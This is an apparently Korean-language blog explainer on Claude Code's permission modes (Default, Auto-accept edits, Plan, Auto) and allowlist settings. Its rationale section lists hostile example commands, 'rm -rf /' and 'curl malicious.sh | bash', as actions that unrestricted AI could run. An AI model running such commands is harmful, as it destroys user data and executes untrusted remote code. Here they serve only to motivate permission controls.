Permission Modes

https://code.claude.com/docs/en/how-claude-code-works

How Claude Code works - Claude Code Docs

 

🤖 Claude Code Permission Modes

 

“Claude가 무엇을 할 수 있는지 제어하는 시스템”

 

Claude Code의 Permission Modes는 단순 옵션이 아니라,

👉 AI의 행동 범위를 단계적으로 통제하는 실행 정책 시스템입니다.

 

🧠 1. Permission Mode란 무엇인가?

Claude Code에서 Permission Mode는

AI가 로컬 환경에서 수행할 수 있는 작업의 범위를 제한하는 보안 정책입니다. 즉,

AI = 생각 + 코드 생성 + 실행 능력
Permission Mode = 실행 권한의 범위 제한

👉 핵심 개념

• AI는 단순히 코드만 생성하는 존재가 아님
• 실제로 파일 수정 / 명령 실행 / 시스템 접근 가능
• 따라서 반드시 “권한 통제”가 필요함

⚠️ 왜 필요한가?

AI가 무제한 권한을 가진다면?

rm -rf /
curl malicious.sh | bash
git push origin main

😱 이런 것도 실행 가능해집니다.

 

👉 그래서 등장한 개념이 바로:

 

Permission Modes = AI의 “행동 허용 범위”를 제어하는 샌드박스

 

 

Claude Code에서는 Shift + Tab을 통해 여러 권한 모드들을 순환할 수 있습니다:

 

⚙️ 2. Permission Modes

🟡 Default Mode 

 

“모든 중요한 작업 전에 사용자에게 묻는다”

 

 

✔ 공식 정의

• 파일 수정 전 → 확인 요청
• shell 커맨드 실행 전 → 확인 요청

✔ 동작 방식

Claude: "이 파일 수정해도 될까요?"
Claude: "이 커맨드 실행해도 될까요?"

👉 항상 사용자 승인 기반 실행

 

✔ 특징

• 가장 안전한 기본 모드 🔐
• Human-in-the-loop 구조
• 예측 가능한 동작

✔ 적합한 상황

• 일반 개발 환경
• 협업 프로젝트
• 초기 AI 사용 단계

 

🟢 Auto-accept edits Mode

 

“파일 수정은 자동, 커맨드 실행은 여전히 승인 필요”

 

 

✔ 공식 정의

• 파일 수정 → ❗ 자동 수행
• shell 커맨드 → ❗ 여전히 사용자 승인 필요

✔ 핵심 변화

(Default)
파일 수정 → 승인 필요 ❌

(Auto-accept edits)
파일 수정 → 자동 수행 ✅

 

✔ 동작 예시

Claude: 파일을 바로 수정함 (묻지 않음)
Claude: "npm install 실행해도 될까요?" (여전히 질문)

 

✔ 특징

• 코드 수정 속도 ↑ 🚀
• 시스템 영향 작업은 여전히 통제됨

✔ 적합한 상황

• 빠른 리팩토링
• UI/프론트 수정 작업
• 반복적인 코드 수정

 

🔵 Plan Mode

 

“실행하지 않고 계획만 만든다”

 

 

✔ 공식 정의

• read-only tools만 사용
• 실행 없이 계획 생성
• 사용자 승인 후 실행 가능

✔ 핵심 개념

AI = 실행자 ❌
AI = 설계자 / 플래너 ✅

 

✔ 동작 흐름

1. Claude: 작업 계획 생성
2. 사용자: 계획 검토
3. 승인 시 → 실제 실행 단계로 이동

 

✔ 특징

• 완전한 비파괴 모드 🧱
• 코드 변경 없음
• 안전한 설계 단계

✔ 적합한 상황

• 대규모 리팩토링 전
• 아키텍처 변경 검토
• 위험 작업 사전 설계

 

🔴 Auto Mode (Research Preview)

 

“Claude가 스스로 판단하여 실행 (백그라운드 안전 검사 포함)”

 

 

✔ 공식 정의

• 모든 작업을 Claude가 스스로 평가
• background safety checks 수행
• 현재는 Research Preview 상태

✔ 핵심 특징

- 파일 수정 → 자동
- 명령 실행 → 자동
- 내부적으로 안전성 검사 수행

 

✔ 중요한 포인트

👉 완전 무제한이 아니라

"자율 실행 + 내부 안전 필터"

구조입니다.

 

✔ 특징

• 최고 수준 자동화 ⚡
• 최소한의 사용자 개입
• 실험적 기능 (주의 필요)

✔ 적합한 상황

• 개인 실험 환경
• 자동화 워크플로우
• 반복 작업 처리

 

🧩 3. 커스텀 권한 설정 (.claude/settings.json)

Claude Code는 디폴트 모드 외에도
👉 특정 명령을 예외적으로 허용할 수 있습니다.

 

📄 설정 파일

{
  "allowedCommands": [
    "npm test",
    "git status"
  ]
}

 

✔ 공식 설명 요약

• 특정 명령은 매번 묻지 않도록 설정 가능
• 신뢰 가능한 명령에 적합
• 반복 작업 효율 ↑

✔ 특징

• Permission Mode의 “세밀한 확장” 🎯
• 화이트리스트 기반 실행

✔ 스코프 (중요🔥)

설정은 다양한 레벨에서 적용 가능:

- Organization (조직 전체 정책)
- Team / Project
- 개인 설정

👉 즉,
회사 정책 → 개인 커스터마이징까지 계층적 제어 가능

 

🧠 4. 구조적으로 보면 (핵심 인사이트)

Claude Code의 Permission Modes는 단순 UI 기능이 아니라
👉 AI 실행 제어 레이어 (Execution Control Layer) 입니다.

 

🔍 내부 흐름

[User]
   ↓
[Permission Mode]
   ↓
[Claude 판단]
   ↓
[Action 실행 or 승인 요청]

 

🎯 핵심 역할

• 실행 여부 결정
• 사용자 개입 수준 조절
• 자동화 vs 안전성 균형

 

⚖️ 5. 권한 모드 비교 요약

Mode	파일 수정	명령 실행	특징
Default	승인 필요	승인 필요	가장 안전
Auto-accept edits	자동	승인 필요	코드 작업 최적
Plan	❌ 실행 없음	❌ 실행 없음	설계 전용
Auto	자동	자동	자율 실행 (실험적)

 

 

🚀 6. 실무에서의 사용 전략

🟢 추천 흐름

1. Plan Mode → 설계 검증
2. Default → 안전한 실행
3. Auto-accept edits → 생산성 향상
4. Auto Mode → 자동화 실험

🔥 핵심 전략

 

“처음엔 통제하고, 점점 위임하라”

 

 

💡 7. 핵심 인사이트

🔑 Insight 1

Permission Mode는 기능이 아니라
👉 AI 행동 통제 정책

 

🔑 Insight 2

Plan Mode → 사고(Thinking)
Default → 협업
Auto → 위임(Delegation)

 

🔑 Insight 3

Claude Code의 본질:

 

“코드를 생성하는 AI”가 아니라
“실행까지 수행하는 에이전트”

 

 

🎯 마무리

Claude Code의 Permission Modes는
👉 AI의 실행 권한을 단계적으로 조절하는 시스템입니다.

 

한 줄 요약:

Default → 물어본다
Auto-accept edits → 수정은 자동
Plan → 실행 없이 계획만
Auto → AI가 알아서 (실험적)